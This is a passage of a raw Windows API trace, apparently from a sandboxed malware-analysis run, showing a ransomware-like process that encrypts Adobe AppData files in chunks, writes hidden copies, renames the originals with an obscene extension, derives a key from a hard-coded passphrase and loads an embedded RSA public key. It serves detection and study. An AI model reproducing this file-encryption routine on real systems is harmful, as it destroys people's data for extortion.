lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.790] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.790] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.791] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.791] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.791] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.791] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.791] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.791] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.791] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.791] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.791] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.791] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.791] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.791] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.791] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.791] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.792] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.792] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.792] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.792] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.792] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.792] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.792] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.792] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.792] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.792] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.792] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.792] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.792] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.793] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.793] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.793] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.793] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.793] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.793] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.793] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.793] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.793] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.793] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.793] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.793] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.793] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.794] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.794] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.794] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.794] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.794] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.794] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.794] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.794] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.794] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.794] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.794] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.794] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.794] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.795] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.795] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.795] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.795] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.795] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.795] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.795] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.795] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.795] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.795] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.795] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.795] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.795] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.796] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.796] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.796] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.796] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.796] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.796] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.796] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.796] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.796] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.796] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.796] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x2d5, lpOverlapped=0x0) returned 1 [0241.796] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x2d5, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x2e0) returned 1 [0241.797] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x2e0, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x2e0, lpOverlapped=0x0) returned 1 [0241.797] CloseHandle (hObject=0x5d44) returned 1 [0241.797] CloseHandle (hObject=0x5d40) returned 1 [0241.802] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\AdobeSysFnt17.lst.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\dc\\adobesysfnt17.lst.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\AdobeSysFnt17.lst" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\dc\\adobesysfnt17.lst"), bFailIfExists=0) returned 1 [0241.826] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\AdobeSysFnt17.lst", dwFileAttributes=0x0) returned 1 [0241.826] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\AdobeSysFnt17.lst.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\dc\\adobesysfnt17.lst.gsg")) returned 1 [0241.829] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\AdobeSysFnt17.lst" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\dc\\adobesysfnt17.lst"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\AdobeSysFnt17.lst.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\dc\\adobesysfnt17.lst.fuck")) returned 1 [0241.833] CryptDestroyHash (hHash=0x28e8078) returned 1 [0241.833] CryptDestroyKey (hKey=0x28e7df8) returned 1 [0241.833] CryptReleaseContext (hProv=0x28f6348, dwFlags=0x0) returned 1 [0241.833] FindNextFileA (in: hFindFile=0x28e7d78, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0241.833] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\Cache\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x28e82b8 [0241.835] FindNextFileA (in: hFindFile=0x28e82b8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0241.835] FindNextFileA (in: hFindFile=0x28e82b8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0241.835] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0241.836] GetLastError () returned 0x0 [0241.836] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\Cache\\AcroFnt15.lst" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\dc\\cache\\acrofnt15.lst")) returned 0x20 [0241.836] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\Cache\\AcroFnt15.lst", dwFileAttributes=0x80) returned 1 [0241.837] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\Cache\\AcroFnt15.lst" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\dc\\cache\\acrofnt15.lst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d44 [0241.837] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\Cache\\AcroFnt15.lst.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\dc\\cache\\acrofnt15.lst.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0241.838] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\Cache\\AcroFnt15.lst.gsg", dwFileAttributes=0x2) returned 1 [0241.840] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x28f6348) returned 1 [0241.842] CryptCreateHash (in: hProv=0x28f6348, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0241.842] lstrlenA (lpString="cjCYuiydaGDqRLBosfDTjZpnzMlQm") returned 29 [0241.842] CryptHashData (hHash=0x28e7f38, pbData=0x2857178, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0241.842] CryptDeriveKey (in: hProv=0x28f6348, Algid=0x6610, hBaseData=0x28e7f38, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x28e7b38) returned 1 [0241.843] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, 